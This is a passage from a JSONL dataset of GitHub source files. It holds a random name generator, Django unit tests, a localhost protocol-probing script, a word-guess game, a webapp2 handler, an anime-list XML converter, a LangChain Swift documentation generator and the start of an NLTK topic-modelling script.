\"essential\",\n \"excellent\",\n \"extraneous\",\n \"fixed\",\n \"flowery\",\n \"formal\",\n \"fresh\",\n \"frosty\",\n \"giving\",\n \"glossy\",\n \"healthy\",\n \"helpful\",\n \"impressionable\",\n \"kind\",\n \"large\",\n \"left\",\n \"long\",\n \"loyal\",\n \"mealy\",\n \"memorable\",\n \"monthly\",\n \"new\",\n \"notable\",\n \"only\",\n \"ordinary\",\n \"passionate\",\n \"perfect\",\n \"pertinent\",\n \"proper\",\n \"puzzled\",\n \"reflecting\",\n \"respectful\",\n \"roasted\",\n \"scholarly\",\n \"shiny\",\n \"slight\",\n \"sparkling\",\n \"spotless\",\n \"stupendous\",\n \"sunny\",\n \"tart\",\n \"terrific\",\n \"timely\",\n \"unique\",\n \"upbeat\",\n \"vacant\",\n \"virtual\",\n \"warm\",\n \"weary\",\n \"whispered\",\n \"worthwhile\",\n \"yellow\",\n]\n\nnouns = [\n \"account\",\n \"acknowledgment\",\n \"address\",\n \"advertising\",\n \"airplane\",\n \"animal\",\n \"appointment\",\n \"arrival\",\n \"artist\",\n \"attachment\",\n \"attitude\",\n \"availability\",\n \"backpack\",\n \"bag\",\n \"balance\",\n \"bass\",\n \"bean\",\n \"beauty\",\n \"bibliography\",\n \"bill\",\n \"bite\",\n \"blossom\",\n \"boat\",\n \"book\",\n \"box\",\n \"boy\",\n \"bread\",\n \"bridge\",\n \"broccoli\",\n \"building\",\n \"butter\",\n \"button\",\n \"cabbage\",\n \"cake\",\n \"camera\",\n \"camp\",\n \"candle\",\n \"candy\",\n \"canvas\",\n \"car\",\n \"card\",\n \"carrot\",\n \"cart\",\n \"case\",\n \"cat\",\n \"chain\",\n \"chair\",\n \"chalk\",\n \"chance\",\n \"change\",\n \"channel\",\n \"character\",\n \"charge\",\n \"charm\",\n \"chart\",\n \"check\",\n \"cheek\",\n \"cheese\",\n \"chef\",\n \"cherry\",\n \"chicken\",\n \"child\",\n \"church\",\n \"circle\",\n \"class\",\n \"clay\",\n \"click\",\n \"clock\",\n \"cloth\",\n \"cloud\",\n \"clove\",\n \"club\",\n \"coach\",\n \"coal\",\n \"coast\",\n \"coat\",\n \"cod\",\n \"coffee\",\n \"collar\",\n \"color\",\n \"comb\",\n \"comfort\",\n \"comic\",\n \"committee\",\n \"community\",\n \"company\",\n \"comparison\",\n \"competition\",\n \"condition\",\n \"connection\",\n \"control\",\n \"cook\",\n \"copper\",\n \"copy\",\n \"corn\",\n \"cough\",\n \"country\",\n \"cover\",\n \"crate\",\n \"crayon\",\n \"cream\",\n \"creator\",\n \"crew\",\n \"crown\",\n \"current\",\n \"curtain\",\n \"curve\",\n \"cushion\",\n \"dad\",\n \"daughter\",\n \"day\",\n \"death\",\n \"debt\",\n \"decision\",\n \"deer\",\n \"degree\",\n \"design\",\n \"desire\",\n \"desk\",\n \"detail\",\n \"development\",\n \"digestion\",\n \"dime\",\n \"dinner\",\n \"direction\",\n \"dirt\",\n \"discovery\",\n \"discussion\",\n \"disease\",\n \"disgust\",\n \"distance\",\n \"distribution\",\n \"division\",\n \"doctor\",\n 
\"dog\",\n \"door\",\n \"drain\",\n \"drawer\",\n \"dress\",\n \"drink\",\n \"driving\",\n \"dust\",\n \"ear\",\n \"earth\",\n \"edge\",\n \"education\",\n \"effect\",\n \"egg\",\n \"end\",\n \"energy\",\n \"engine\",\n \"error\",\n \"event\",\n \"example\",\n \"exchange\",\n \"existence\",\n \"expansion\",\n \"experience\",\n \"expert\",\n \"eye\",\n \"face\",\n \"fact\",\n \"fall\",\n \"family\",\n \"farm\",\n \"father\",\n \"fear\",\n \"feeling\",\n \"field\",\n \"finger\",\n \"fire\",\n \"fish\",\n \"flag\",\n \"flight\",\n \"floor\",\n \"flower\",\n \"fold\",\n \"food\",\n \"football\",\n \"force\",\n \"form\",\n \"frame\",\n \"friend\",\n \"frog\",\n \"fruit\",\n \"fuel\",\n \"furniture\",\n \"game\",\n \"garden\",\n \"gate\",\n \"girl\",\n \"glass\",\n \"glove\",\n \"goat\",\n \"gold\",\n \"government\",\n \"grade\",\n \"grain\",\n \"grass\",\n \"green\",\n \"grip\",\n \"group\",\n \"growth\",\n \"guide\",\n \"guitar\",\n \"hair\",\n \"hall\",\n \"hand\",\n \"harbor\",\n \"harmony\",\n \"hat\",\n \"head\",\n \"health\",\n \"heart\",\n \"heat\",\n \"hill\",\n \"history\",\n \"hobbies\",\n \"hole\",\n \"hope\",\n \"horn\",\n \"horse\",\n \"hospital\",\n \"hour\",\n \"house\",\n \"humor\",\n \"idea\",\n \"impulse\",\n \"income\",\n \"increase\",\n \"industry\",\n \"ink\",\n \"insect\",\n \"instrument\",\n \"insurance\",\n \"interest\",\n \"invention\",\n \"iron\",\n \"island\",\n \"jelly\",\n \"jet\",\n \"jewel\",\n \"join\",\n \"judge\",\n \"juice\",\n \"jump\",\n \"kettle\",\n \"key\",\n \"kick\",\n \"kiss\",\n \"kitten\",\n \"knee\",\n \"knife\",\n \"knowledge\",\n \"land\",\n \"language\",\n \"laugh\",\n \"law\",\n \"lead\",\n \"learning\",\n \"leather\",\n \"leg\",\n \"lettuce\",\n \"level\",\n \"library\",\n \"lift\",\n \"light\",\n \"limit\",\n \"line\",\n \"linen\",\n \"lip\",\n \"liquid\",\n \"list\",\n \"look\",\n \"loss\",\n \"love\",\n \"lunch\",\n \"machine\",\n \"man\",\n \"manager\",\n \"map\",\n \"marble\",\n \"mark\",\n \"market\",\n \"mass\",\n \"match\",\n \"meal\",\n \"measure\",\n \"meat\",\n \"meeting\",\n \"memory\",\n \"metal\",\n \"middle\",\n \"milk\",\n \"mind\",\n \"mine\",\n \"minute\",\n \"mist\",\n \"mitten\",\n \"mom\",\n \"money\",\n \"monkey\",\n \"month\",\n \"moon\",\n \"morning\",\n \"mother\",\n \"motion\",\n \"mountain\",\n \"mouth\",\n \"muscle\",\n \"music\",\n \"nail\",\n \"name\",\n \"nation\",\n \"neck\",\n \"need\",\n \"news\",\n \"night\",\n \"noise\",\n \"note\",\n \"number\",\n \"nut\",\n \"observation\",\n \"offer\",\n \"oil\",\n \"operation\",\n \"opinion\",\n \"orange\",\n \"order\",\n \"organization\",\n \"ornament\",\n \"oven\",\n \"page\",\n \"pail\",\n \"pain\",\n \"paint\",\n \"pan\",\n \"pancake\",\n \"paper\",\n \"parcel\",\n \"parent\",\n \"part\",\n \"passenger\",\n \"paste\",\n \"payment\",\n \"peace\",\n \"pear\",\n \"pen\",\n \"pencil\",\n \"person\",\n \"pest\",\n \"pet\",\n \"picture\",\n \"pie\",\n \"pin\",\n \"pipe\",\n \"pizza\",\n \"place\",\n \"plane\",\n \"plant\",\n \"plastic\",\n \"plate\",\n \"play\",\n \"pleasure\",\n \"plot\",\n \"plough\",\n \"pocket\",\n \"point\",\n \"poison\",\n \"police\",\n \"pollution\",\n \"popcorn\",\n \"porter\",\n \"position\",\n \"pot\",\n \"potato\",\n \"powder\",\n \"power\",\n \"price\",\n \"print\",\n \"process\",\n \"produce\",\n \"product\",\n \"profit\",\n \"property\",\n \"prose\",\n \"protest\",\n \"pull\",\n \"pump\",\n \"punishment\",\n \"purpose\",\n \"push\",\n \"quarter\",\n \"question\",\n \"quiet\",\n \"quill\",\n \"quilt\",\n \"quince\",\n \"rabbit\",\n \"rail\",\n 
\"rain\",\n \"range\",\n \"rat\",\n \"rate\",\n \"ray\",\n \"reaction\",\n \"reading\",\n \"reason\",\n \"record\",\n \"regret\",\n \"relation\",\n \"religion\",\n \"representative\",\n \"request\",\n \"respect\",\n \"rest\",\n \"reward\",\n \"rhythm\",\n \"rice\",\n \"river\",\n \"road\",\n \"roll\",\n \"room\",\n \"root\",\n \"rose\",\n \"route\",\n \"rub\",\n \"rule\",\n \"run\",\n \"sack\",\n \"sail\",\n \"salt\",\n \"sand\",\n \"scale\",\n \"scarecrow\",\n \"scarf\",\n \"scene\",\n \"scent\",\n \"school\",\n \"science\",\n \"scissors\",\n \"screw\",\n \"sea\",\n \"seat\",\n \"secretary\",\n \"seed\",\n \"selection\",\n \"self\",\n \"sense\",\n \"servant\",\n \"shade\",\n \"shake\",\n \"shame\",\n \"shape\",\n \"sheep\",\n \"sheet\",\n \"shelf\",\n \"ship\",\n \"shirt\",\n \"shock\",\n \"shoe\",\n \"shop\",\n \"show\",\n \"side\",\n \"sign\",\n \"silk\",\n \"sink\",\n \"sister\",\n \"size\",\n \"sky\",\n \"sleep\",\n \"smash\",\n \"smell\",\n \"smile\",\n \"smoke\",\n \"snail\",\n \"snake\",\n \"sneeze\",\n \"snow\",\n \"soap\",\n \"society\",\n \"sock\",\n \"soda\",\n \"sofa\",\n \"son\",\n \"song\",\n \"sort\",\n \"sound\",\n \"soup\",\n \"space\",\n \"spark\",\n \"speed\",\n \"sponge\",\n \"spoon\",\n \"spray\",\n \"spring\",\n \"spy\",\n \"square\",\n \"stamp\",\n \"star\",\n \"start\",\n \"statement\",\n \"station\",\n \"steam\",\n \"steel\",\n \"stem\",\n \"step\",\n \"stew\",\n \"stick\",\n \"stitch\",\n \"stocking\",\n \"stomach\",\n \"stone\",\n \"stop\",\n \"store\",\n \"story\",\n \"stove\",\n \"stranger\",\n \"straw\",\n \"stream\",\n \"street\",\n \"stretch\",\n \"string\",\n \"structure\",\n \"substance\",\n \"sugar\",\n \"suggestion\",\n \"suit\",\n \"summer\",\n \"sun\",\n \"support\",\n \"surprise\",\n \"sweater\",\n \"swim\",\n \"system\",\n \"table\",\n \"tail\",\n \"talk\",\n \"tank\",\n \"taste\",\n \"tax\",\n \"tea\",\n \"teaching\",\n \"team\",\n \"tendency\",\n \"test\",\n \"texture\",\n \"theory\",\n \"thing\",\n \"thought\",\n \"thread\",\n \"throat\",\n \"thumb\",\n \"thunder\",\n \"ticket\",\n \"time\",\n \"tin\",\n \"title\",\n \"toad\",\n \"toe\",\n \"tooth\",\n \"toothpaste\",\n \"touch\",\n \"town\",\n \"toy\",\n \"trade\",\n \"train\",\n \"transport\",\n \"tray\",\n \"treatment\",\n \"tree\",\n \"trick\",\n \"trip\",\n \"trouble\",\n \"trousers\",\n \"truck\",\n \"tub\",\n \"turkey\",\n \"turn\",\n \"twist\",\n \"umbrella\",\n \"uncle\",\n \"underwear\",\n \"unit\",\n \"use\",\n \"vacation\",\n \"value\",\n \"van\",\n \"vase\",\n \"vegetable\",\n \"veil\",\n \"vein\",\n \"verse\",\n \"vessel\",\n \"view\",\n \"visitor\",\n \"voice\",\n \"volcano\",\n \"walk\",\n \"wall\",\n \"war\",\n \"wash\",\n \"waste\",\n \"watch\",\n \"water\",\n \"wave\",\n \"wax\",\n \"way\",\n \"wealth\",\n \"weather\",\n \"week\",\n \"weight\",\n \"wheel\",\n \"whip\",\n \"whistle\",\n \"window\",\n \"wine\",\n \"wing\",\n \"winter\",\n \"wire\",\n \"wish\",\n \"woman\",\n \"wood\",\n \"wool\",\n \"word\",\n \"work\",\n \"worm\",\n \"wound\",\n \"wrist\",\n \"writer\",\n \"yard\",\n \"yoke\",\n \"zebra\",\n \"zinc\",\n \"zipper\",\n \"zone\",\n]\n\n\ndef random_name() -> str:\n \"\"\"Generate a random name.\"\"\"\n adjective = random.choice(adjectives)\n noun = random.choice(nouns)\n number = random.randint(1, 100)\n return 
f\"{adjective}-{noun}-{number}\"\n","repo_name":"langchain-ai/langchain","sub_path":"libs/langchain/langchain/smith/evaluation/name_generation.py","file_name":"name_generation.py","file_ext":"py","file_size_in_byte":9936,"program_lang":"python","lang":"hr","doc_type":"code","stars":68990,"dataset":"github-code","pt":"7"} +{"seq_id":"17407102203","text":"from django.test import TestCase\nfrom api.views import classifier, uploadpeople, companyemployees, persons\nfrom api.models import User\nimport time\nimport json\n\n# Create your tests here.\n\nclass PandoraTestCase(TestCase):\n def setUp(self):\n pass\n\n\n def test_classifier(self):\n print(\"Starting Fruits and Vegetables Classifier Test...\")\n\n #Change it to any names it will classify from world's database\n fruitlist = ['grapes','mango','banana','kiwi']\n vegetablelist = ['chilli','eggplant','peas','potato']\n\n for fruit in fruitlist:\n self.assertEqual(classifier(fruit), 'fruit')\n\n for vegetable in vegetablelist:\n self.assertEqual(classifier(vegetable), 'vegetable')\n print(\"Classifier Test Completed\")\n \n \n\n def test_uploadpeople(self):\n print(\"Starting Upload People Data Test...\")\n env = 'test'\n request = ''\n uploadpeople(None, env)\n time.sleep(7)\n users = User.objects.all()\n count = users.count()\n self.assertEqual(count, 3)\n print(\"Upload People Test Completed\")\n\n\n def test_persons(self):\n print(\"Starting Two People given Data Test...\")\n env = 'test'\n request = ''\n uploadpeople(None, env)\n time.sleep(7)\n result = persons(None, persononename=\"Carmella0\", persontwoname=\"Bonnie2\")\n result = json.loads(result.content)\n print(result)\n expected = {'personone': {'id': 1, 'name': 'Carmella Lambert', 'age': 61, 'address': '628 Sumner Place, Sperryville, American Samoa, 9819', 'phone': '+1 (910) 567-3630'}, 'persontwo': {'id': 3, 'name': 'Bonnie Bass', 'age': 54, 'address': '455 Dictum Court, Nadine, Mississippi, 6499', 'phone': '+1 (823) 428-3710'}, 'friends': {2: {'id': 2, 'name': 'Decker Mckenzie', 'eyeColor': 'brown', 'has_died': False}}}\n self.assertEqual(json.dumps(result), json.dumps(expected))\n\n def test_companygiven(self):\n pass\n\n\n\n\n\n\n","repo_name":"sanket135/pandora","sub_path":"api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7592733956","text":"#!/usr/bin/env python3\n\nimport sys\nimport socket\nimport hashlib\n\nPREFIX_MAX_LENGTH = 1\nSUFFIX_MAX_LENGTH = 1\n\nCOMMANDS = [b\"IACK\\n\", b\"IREQ_0_0_0\\n\", b\"IREQ_0_0_1\\n\", b\"IREQ_0_1_0\\n\",\n b\"IREQ_0_1_1\\n\", b\"IREQ_1_0_0\\n\", b\"IREQ_1_0_1\\n\", b\"IREQ_1_1_0\\n\",\n b\"IREQ_1_1_1\\n\", b\"ISENDFRAME\\n\", b\"ITIMEOUT\\n\"]\n\nif len(sys.argv) >= 2:\n host = sys.argv[1]\n port = int(sys.argv[2])\nelse: # defaults to this on my system\n host = \"localhost\"\n port = 7892\n\ndef gen_traces(cmds,max_length,current=[]):\n \"Generate all combination of commands up to a maximum length\"\n yield current\n if max_length > 0:\n for cmd in cmds:\n for trace in gen_traces(cmds, max_length-1, current + [cmd]):\n yield trace\n\ndef printable_trace(trace):\n if trace:\n return \" \".join([cmd[:-1].decode(\"utf-8\").replace(\"_\",\"-\") for cmd in trace])\n else:\n return \"\\\\textepsilon\"\n\ndef valid_path(path,s):\n s.send(b\"reset\\n\") # reset before every trace\n response = False\n for cmd in path:\n s.send(cmd)\n response = (s.recv(1024))\n if response == b'Oquiescence\\n':\n return 
False\n if response:\n return response.decode(\"utf-8\")[-6:-1].replace(\"_\",\"-\")\n return False\n\n\nrow_colors = [\"white\",\n \"red!50\",\"blue!50\",\"green!50\",\"yellow!50\",\"magenta!50\",\"cyan!50\",\n \"red!20\",\"blue!20\",\"green!20\",\"yellow!20\",\"magenta!20\",\"cyan!20\",\n \"gray!50\",\"gray!40\",\"gray!30\",\"gray!20\",\"gray!10\",\"gray!0\",]\nrow_colors_index = 0\nrow_dict = {}\n\ndef gen_row_color(seq):\n global row_colors,row_colors_index,row_dict\n if seq in row_dict:\n return row_dict[seq]\n else:\n row_dict[seq] = row_colors[row_colors_index]\n row_colors_index += 1\n return row_dict[seq]\n\n\n\ns = socket.socket()\ns.connect((host,port))\n\nprefix_traces = list(gen_traces(COMMANDS,PREFIX_MAX_LENGTH))\nsuffix_traces = list(gen_traces(COMMANDS,SUFFIX_MAX_LENGTH))\n\nsignature = hashlib.sha1()\n\n# print to stdout latex code for a nice table\n\nsys.stdout.write(\"{\\\\footnotesize\")\n# sys.stdout.write(\"{\\\\tiny\")\nsys.stdout.write(\"\\\\begin{longtable}{l |\")\nsys.stdout.write(\" l\"*len(suffix_traces))\nsys.stdout.write(\"}\\n prefix/suffix & \")\nsys.stdout.write(\" & \".join([\"\\\\begin{rotate}{30} %s \\\\end{rotate}\"%printable_trace(t) for t in suffix_traces]))\nsys.stdout.write(\"\\\\\\\\\\n\\\\hline\\n\")\nfor y,prefix in enumerate(prefix_traces):\n suffix_results = [valid_path(prefix + suffix,s) for suffix in suffix_traces]\n sys.stdout.write(\"\\\\rowcolor{%s}\\n\"%gen_row_color(str(suffix_results)))\n sys.stdout.write( printable_trace(prefix))\n signature.update(repr(prefix).encode(\"utf-8\") + repr(suffix_results).encode(\"utf-8\"))\n for x,result in enumerate(suffix_results):\n sys.stdout.write(\" & \\\\-\" if result else \" & \\\\delta\")\n sys.stdout.write(\"\\\\\\\\\\n\")\ns.close()\n\nsys.stdout.write(\"\\\\end{longtable}\\n}\\n\")\nsys.stdout.write(\"%% sha1 of table results: %s\"%signature.hexdigest())\n","repo_name":"Witik/CommandlineCalculator","sub_path":"assignment4/brpmodeler.py","file_name":"brpmodeler.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"24566472647","text":"import random\n\nLEXICON_FILE = \"Lexicon.txt\" # File to read word list from\nINITIAL_GUESSES = 8 # Initial number of guesses player starts with\n\n\ndef play_game(secret_word):\n \"\"\"\n Add your code (remember to delete the \"pass\" below)\n \"\"\"\n starting_display = len(secret_word) * (\"-\")\n redisplay = ''\n tries_left = INITIAL_GUESSES\n while True:\n print(f'The word now looks like this: {starting_display}')\n print(f'You have {tries_left} guesses left')\n ask_for_letter = input('Type a single letter here, then press enter: ')\n for i in range(len(secret_word)):\n if ask_for_letter.upper() == secret_word[i]:\n starting_display = list(starting_display)\n starting_display[i] = ask_for_letter.upper()\n for x in starting_display:\n redisplay += x\n starting_display = redisplay\n redisplay = ''\n\n if len(ask_for_letter) != 1:\n print('Guess should only be a single character.')\n elif ask_for_letter.upper() in secret_word:\n print(\"That guess is correct\")\n else:\n tries_left -= 1\n print(f\"There are no {ask_for_letter.upper()}'s in the word\")\n\n if tries_left == 0:\n print(f\"Sorry, you lost. 
The secret word was: {secret_word}\")\n break\n\n if starting_display == secret_word:\n print(f\"Congratulations, the word is: {secret_word}\")\n break\n\n\ndef get_word():\n \"\"\"\n This function returns a secret word that the player is trying\n to guess in the game. This function initially has a very small\n list of words that it can select from to make it easier for you\n to write and debug the main game playing program. In Part II of\n writing this program, you will re-implement this function to\n select a word from a much larger list by reading a list of words\n from the file specified by the constant LEXICON_FILE.\n \"\"\"\n file = open(LEXICON_FILE)\n word_list = []\n for line in file:\n line = line[:-1]\n word_list.append(line)\n index = random.randrange(len(word_list))\n word = word_list[index]\n return word\n\n\ndef main():\n \"\"\"\n To play the game, we first select the secret word for the\n player to guess and then play the game using that secret word.\n \"\"\"\n secret_word = get_word()\n play_game(secret_word)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aJanjgava/CS106A-Python","sub_path":"Assignment5/word_guess.py","file_name":"word_guess.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37110749557","text":"import webapp2\nfrom jinja2 import Environment, FileSystemLoader\n\nJINJA_ENV=Environment(loader=FileSystemLoader(\"\"),\n extensions=[\"jinja2.ext.autoescape\"],\n autoescape=True)\n\nclass MainController(webapp2.RequestHandler):\n def get(self):\n\n template_values = {\n \"world_type\": self.request.get(\"kind\", default_value=\"Pretty\")\n }\n\n template = JINJA_ENV.get_template(\"pretty_template.html\")\n\n self.response.headers[\"Content-Type\"] = \"text/html; charset=utf-8\"\n self.response.write(template.render(template_values))\n\n","repo_name":"ikurilin/AppEngine-DataDownloader","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13934831381","text":"import re\nfrom unittest import result\nfrom pathlib import Path\nfrom tqdm import tqdm\nfrom yattag import Doc, indent\n\ntry:\n f = Path(__file__).with_name('export.txt')\n with f.open('r', encoding=\"utf-8\") as f:\n matches = re.findall(r\"(/)(\\d+)\", f.read())\nexcept FileNotFoundError:\n print(\"Please make sure export.txt exists\")\n exit()\n\ntry:\n f = Path(__file__).with_name('export.txt')\n with f.open('r', encoding=\"utf-8\") as f:\n matches2 = re.findall(r\"(# )([A-Za-z:0-9 !?\\-\\\\'\\\"\\\\\\’,.~\\/!@#$%^&*()_\\+ä;:\\[\\]‘é`]+)\", f.read())\nexcept FileNotFoundError:\n print(\"Please make sure export.txt exists\")\n exit()\n\n\nanimesID = []\nanimeName = []\nfor ids in matches:\n animesID.append(ids[1])\nfor names in matches2:\n animeName.append(names[1])\n\nf2 = open(\"./senpaii.xml\", \"w\", encoding=\"utf-8\")\nf2.write(\"\")\nf2.close()\n\npbar = tqdm(desc=\"Progress\", total= len(animesID))\n\ni=0\ntry:\n \n for animeID in animesID:\n \n doc, tag, text = Doc().tagtext()\n try:\n with tag('root'):\n with tag('anime'):\n with tag('series_animedb_id'):\n text(animeID)\n with tag('series_title'):\n text(animeName[i])\n with tag('series_type'):\n text(\"\")\n with tag('series_episodes'):\n text(\"\")\n with tag('my_id'):\n text(\"0\")\n with tag('my_watched_episodes'):\n text(\"\")\n with tag('my_start_date'):\n 
text(\"0000-00-00\")\n with tag('my_finish_date'):\n text(\"0000-00-00\")\n with tag('my_rated'):\n text(\"\")\n with tag('my_score'):\n text(\"\")\n with tag('my_dvd'):\n text(\"\")\n with tag('my_storage'):\n text(\"\")\n with tag('my_status'):\n text('Completed')\n with tag('my_comments'):\n text(\"\")\n with tag('my_times_watched'):\n text('0')\n with tag('my_rewatch_value'):\n text('Low')\n with tag('my_tags'):\n text('')\n with tag('my_rewatching'):\n text('0')\n with tag('my_rewatching_ep'):\n text('0')\n with tag('update_on_import'):\n text('1')\n \n result = indent(\n doc.getvalue(),\n indentation = ' '*4,\n newline = '\\n'\n )\n \n f2 = open(\"./senpaii.xml\", \"a\", encoding=\"utf-8\")\n f2.write('\\n')\n f2.write(result)\n f2.write('\\n')\n f2.close\n except (Exception, AttributeError,TypeError,ValueError):\n print(' Something went wrong')\n i = i + 1\n pbar.update()\n \nexcept KeyboardInterrupt:\n pbar.close()\n print(' Downt\\' leawwe me senpai')\n print(' 😣😣😣')\n exit()\n \npbar.close()\n#Hiwwo there... You probably are wondering why this is here... right?\n#Well... to be honest I am trying to figure why and how does this work... but it does the job done :D","repo_name":"darkmastermindz/9animeToMAL","sub_path":"start_instant.py","file_name":"start_instant.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"7485475582","text":"import logging\nfrom typing import List\n\nfrom langchain.chains.summarize import load_summarize_chain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.text_splitter import Document, RecursiveCharacterTextSplitter\nfrom tree_sitter import Node\nfrom langchain.schema import SystemMessage\nfrom langchain.prompts import PromptTemplate, ChatPromptTemplate, HumanMessagePromptTemplate\nfrom langchain import LLMChain\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nCHAT_MODEL_NAME = \"gpt-4\"\nMAX_TOKENS = 1024\n\n####################################################################################################################\nFUNCTION_DOC_INSTRUCTION = \"\"\"\nYou generate documentation comments for provided Swift functions, following the official Apple and Swift guidelines. The comment include:\n\n1. A concise description of the function's purpose and data flow.\n2. A list of the function's parameters, with a description for each.\n3. A description of the function's return value, if applicable.\n4. 
Any additional notes or context, if necessary.\n\nExample function:\ninternal static func _typeMismatch(at path: [CodingKey], expectation: Any.Type, reality: Any) -> DecodingError {\n let description = \"Expected to decode \\(expectation) but found \\(_typeDescription(of: reality)) instead.\"\n return .typeMismatch(expectation, Context(codingPath: path, debugDescription: description))\n}\n\nGenerated comment:\n/// Returns a `.typeMismatch` error describing the expected type.\n///\n/// - parameter path: The path of `CodingKey`s taken to decode a value of this type.\n/// - parameter expectation: The type expected to be encountered.\n/// - parameter reality: The value that was encountered instead of the expected type.\n/// - returns: A `DecodingError` with the appropriate path and debug description.\n\"\"\"\n####################################################################################################################\nFUNCTION_DOC_PROMPT = \"\"\"\nFunction implementation:\n```\n{function_implementation}\n```\n\nPlease provide the documentation comment based on the given function implementation.\n\"\"\"\n####################################################################################################################\nREFINE_PROMPT_TMPL = (\n \"Your job is to produce a final standalone concise documentation comment for a type described by code or comments, \\n\"\n \"following the official Apple and Swift guidelines.\\n\"\n \"The comment include:\\n\"\n \"A concise description of the code's purpose and data flow.\\n\"\n \"Any additional notes or context, if necessary.\\n\"\n \"Every line in your reply should start with ///\\n\"\n \"We have provided an existing documentation up to a certain point: {existing_answer}\\n\"\n \"We have the opportunity to refine the existing documentation with some more context below.\\n\"\n \"------------\\n\"\n \"{text}\\n\"\n \"------------\\n\"\n \"Given the new context, refine the original documentation.\\n\"\n \"If the context isn't useful, return the original documentation.\\n\"\n)\nREFINE_PROMPT = PromptTemplate(\n input_variables=[\"existing_answer\", \"text\"],\n template=REFINE_PROMPT_TMPL,\n)\nprompt_template = \"\"\"Write a concise standalone documentation comment for a type described by code or comments, following the official Apple and Swift guidelines:\n\n\"{text}\"\n\ndocumentation comment where every line starts with ///:\"\"\"\nPROMPT = PromptTemplate(template=prompt_template, input_variables=[\"text\"])\n####################################################################################################################\n\nchat_model = ChatOpenAI(model_name=CHAT_MODEL_NAME, temperature=0, request_timeout=180, max_tokens=MAX_TOKENS)\nsum_chain = load_summarize_chain(chat_model, chain_type=\"refine\", question_prompt=PROMPT, refine_prompt=REFINE_PROMPT)\n\n\ndef wrap_triple_slash_comments(text: str, max_line_length=120):\n lines = text.split(\"\\n\")\n wrapped_lines = []\n\n for line in lines:\n line = line.strip()\n if not line.startswith(\"///\"):\n break\n\n indent = len(line) - len(line.lstrip())\n words = line.split()\n current_line = words[0]\n for word in words[1:]:\n if len(current_line) + len(word) + 1 > max_line_length:\n wrapped_lines.append(current_line)\n current_line = \" \" * indent + \"/// \" + word\n else:\n current_line += f\" {word}\"\n wrapped_lines.append(current_line)\n\n return \"\\n\".join(wrapped_lines)\n\n\ndef generate_function_documentation(function_implementation: str) -> str:\n prompt = 
ChatPromptTemplate.from_messages(\n [\n SystemMessage(content=FUNCTION_DOC_INSTRUCTION),\n HumanMessagePromptTemplate.from_template(FUNCTION_DOC_PROMPT),\n ]\n )\n\n chain = LLMChain(llm=chat_model, prompt=prompt)\n result = chain({\"function_implementation\": function_implementation})\n return wrap_triple_slash_comments(result[\"text\"])\n\n\ndef chain_summarize(text: str) -> str:\n logger.info(f\"Summarizing text:\\n{text}\")\n try:\n docs = RecursiveCharacterTextSplitter().split_documents([Document(page_content=text)])\n return wrap_triple_slash_comments(sum_chain.run(docs))\n except Exception:\n logger.error(f\"Failed to summarize text:\\n{text}\")\n return \"\"\n\n\ndef generate_function_summary(function: Node) -> str:\n func_body = function.text.decode(\"utf8\")\n if len(func_body.splitlines()) <= 1:\n logger.info(f\"Function/property body is too short, skipping:\\n{func_body}\")\n return \"\"\n\n try:\n return wrap_triple_slash_comments(generate_function_documentation(func_body))\n except Exception as e:\n logger.error(f\"Failed to generate documentation for function:\\n{func_body}\")\n logger.error(e)\n return chain_summarize(func_body)\n\n\ndef generate_combined_summary(summaries: List[str]) -> str:\n combined = (\n \"/// Documentation of all methods and properties in the current type, should not be included in final documentation:\\n///\\n\"\n + \"\\n///\\n\".join(summaries)\n )\n return chain_summarize(combined)\n\n\ndef generate_class_body_summary(class_body: str) -> str:\n return chain_summarize(class_body)\n\n\nif __name__ == \"__main__\":\n # Example usage\n swift_function = \"\"\"\n @usableFromInline\n func typeName(_ type: Any.Type) -> String {\n var name = _typeName(type, qualified: true)\n if let index = name.firstIndex(of: \".\") {\n name.removeSubrange(...index)\n }\n let sanitizedName =\n name\n .replacingOccurrences(\n of: #\"<.+>|\\(unknown context at \\$[[:xdigit:]]+\\)\\.\"#,\n with: \"\",\n options: .regularExpression\n )\n return sanitizedName\n }\n \"\"\"\n\n documentation_comment = chain_summarize(swift_function)\n print(documentation_comment)\n documentation_comment = generate_function_documentation(swift_function)\n print(documentation_comment)\n","repo_name":"Saik0s/SwiftDocAutomator","sub_path":"summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":6944,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"16776506934","text":"import pandas as pd \nimport re\nimport json\nfrom nltk.tag import pos_tag\nfrom nltk.chunk import conlltags2tree, tree2conlltags\nfrom nltk.stem import WordNetLemmatizer, SnowballStemmer\nfrom nltk.stem.porter import *\nfrom nltk.stem.lancaster import LancasterStemmer\nimport nltk\nimport gensim\nfrom gensim import corpora, models\nimport math\nfrom gensim.test.utils import datapath\nimport json\nimport networkx as nx\nfrom matplotlib.pyplot import figure\nimport matplotlib.pyplot as plt\n\nstopwords = nltk.corpus.stopwords.words('english')\nlemmatizer = WordNetLemmatizer()\nstemmer = SnowballStemmer(\"english\")\np_stemmer = PorterStemmer()\nl_stemmer = LancasterStemmer()\n\n\"\"\" \nREMINDER: TODO: Change this folder to your own folder containing the saved states\nYou might need to increase the ram usage for your IDE to more than 4GB\nDownload saved_state files here https://drive.google.com/file/d/1LdL85edkbR-YW2ZhTDnbRiblUgOnrXOU/view?usp=sharing\nYou require a SMU account\n\"\"\"\nSAVED_STATES_FOLDER = 
